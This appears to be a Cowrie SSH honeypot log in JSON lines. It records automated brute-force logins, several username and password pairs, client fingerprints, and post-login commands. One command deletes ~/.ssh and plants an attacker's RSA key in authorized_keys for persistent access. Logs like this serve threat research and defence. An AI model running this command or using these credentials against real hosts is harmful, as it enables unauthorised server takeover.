{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:33:02.541627Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:02.542559Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34804,"dst_ip":"1.2.3.4","dst_port":22,"session":"04c7f352ad42","protocol":"ssh","message":"New connection: 212.227.235.229:34804 (1.2.3.4:22) [session: 04c7f352ad42]","sensor":"my-vps","timestamp":"2025-09-08T22:33:02.853675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:33:02.854937Z","src_ip":"212.227.235.229","session":"04c7f352ad42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:33:03.165838Z","src_ip":"212.227.235.229","session":"04c7f352ad42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44388,"dst_ip":"1.2.3.4","dst_port":22,"session":"fae824b27019","protocol":"ssh","message":"New connection: 212.227.235.229:44388 (1.2.3.4:22) [session: fae824b27019]","sensor":"my-vps","timestamp":"2025-09-08T22:33:03.459030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:33:03.459747Z","src_ip":"212.227.235.229","session":"fae824b27019"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:33:03.559144Z","src_ip":"212.227.235.229","session":"fae824b27019"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"Welcome1","message":"login attempt [lsfadmin/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:33:03.999875Z","src_ip":"212.227.235.229","session":"fae824b27019"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:33:04.445290Z","src_ip":"212.227.235.229","session":"04c7f352ad42"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:05.101316Z","src_ip":"212.227.235.229","session":"fae824b27019"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:05.755882Z","src_ip":"212.227.235.229","session":"04c7f352ad42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34808,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f4395f67a78","protocol":"ssh","message":"New connection: 212.227.235.229:34808 (1.2.3.4:22) [session: 5f4395f67a78]","sensor":"my-vps","timestamp":"2025-09-08T22:33:06.058242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:33:06.058818Z","src_ip":"212.227.235.229","session":"5f4395f67a78"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:33:06.362161Z","src_ip":"212.227.235.229","session":"5f4395f67a78"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:33:07.612062Z","src_ip":"212.227.235.229","session":"5f4395f67a78"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:07.915666Z","src_ip":"212.227.235.229","session":"f3236cd1440d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:07.916831Z","src_ip":"212.227.235.229","session":"5f4395f67a78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50252,"dst_ip":"1.2.3.4","dst_port":22,"session":"85d448031543","protocol":"ssh","message":"New connection: 212.227.235.229:50252 (1.2.3.4:22) [session: 85d448031543]","sensor":"my-vps","timestamp":"2025-09-08T22:33:43.481745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:33:43.482532Z","src_ip":"212.227.235.229","session":"85d448031543"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:33:43.816545Z","src_ip":"212.227.235.229","session":"85d448031543"}
{"eventid":"cowrie.login.failed","username":"acer","password":"acer@2025","message":"login attempt [acer/acer@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:33:45.188453Z","src_ip":"212.227.235.229","session":"85d448031543"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48962,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c83776f96b3","protocol":"ssh","message":"New connection: 212.227.235.229:48962 (1.2.3.4:22) [session: 6c83776f96b3]","sensor":"my-vps","timestamp":"2025-09-08T22:33:45.856047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:33:45.856937Z","src_ip":"212.227.235.229","session":"6c83776f96b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:33:46.092902Z","src_ip":"212.227.235.229","session":"6c83776f96b3"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:46.524098Z","src_ip":"212.227.235.229","session":"85d448031543"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345","message":"login attempt [test3/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:33:47.078022Z","src_ip":"212.227.235.229","session":"6c83776f96b3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:48.316897Z","src_ip":"212.227.235.229","session":"6c83776f96b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56078,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeb320987134","protocol":"ssh","message":"New connection: 212.227.235.229:56078 (1.2.3.4:22) [session: eeb320987134]","sensor":"my-vps","timestamp":"2025-09-08T22:33:50.702522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:33:50.703482Z","src_ip":"212.227.235.229","session":"eeb320987134"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:33:50.947861Z","src_ip":"212.227.235.229","session":"eeb320987134"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:33:51.966878Z","src_ip":"212.227.235.229","session":"eeb320987134"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:33:53.213054Z","src_ip":"212.227.235.229","session":"eeb320987134"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44990,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc896b1346c","protocol":"ssh","message":"New connection: 212.227.235.229:44990 (1.2.3.4:22) [session: 8dc896b1346c]","sensor":"my-vps","timestamp":"2025-09-08T22:34:03.024271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:03.025958Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:03.343525Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd123","message":"login attempt [root/abcd123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:34:03.960777Z","src_ip":"212.227.125.160","session":"1e81b32430da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:34:04.019295Z","src_ip":"212.227.125.160","session":"1e81b32430da"}
{"eventid":"cowrie.login.success","username":"root","password":"root123456*","message":"login attempt [root/root123456*] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:34:04.654907Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:34:05.347919Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:34:05.348757Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:34:05.349518Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:05.667077Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:34:06.315742Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:34:06.316457Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:34:06.635085Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:06.636211Z","src_ip":"212.227.235.229","session":"8dc896b1346c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45006,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a3905e37dc3","protocol":"ssh","message":"New connection: 212.227.235.229:45006 (1.2.3.4:22) [session: 8a3905e37dc3]","sensor":"my-vps","timestamp":"2025-09-08T22:34:06.918443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:06.919438Z","src_ip":"212.227.235.229","session":"8a3905e37dc3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:34:07.221215Z","src_ip":"212.227.235.229","session":"8a3905e37dc3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:34:08.461176Z","src_ip":"212.227.235.229","session":"8a3905e37dc3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:34:09.763297Z","src_ip":"212.227.235.229","session":"8a3905e37dc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49294,"dst_ip":"1.2.3.4","dst_port":22,"session":"d82ee85d8544","protocol":"ssh","message":"New connection: 212.227.235.229:49294 (1.2.3.4:22) [session: d82ee85d8544]","sensor":"my-vps","timestamp":"2025-09-08T22:34:10.082979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:34:10.083925Z","src_ip":"212.227.235.229","session":"d82ee85d8544"}
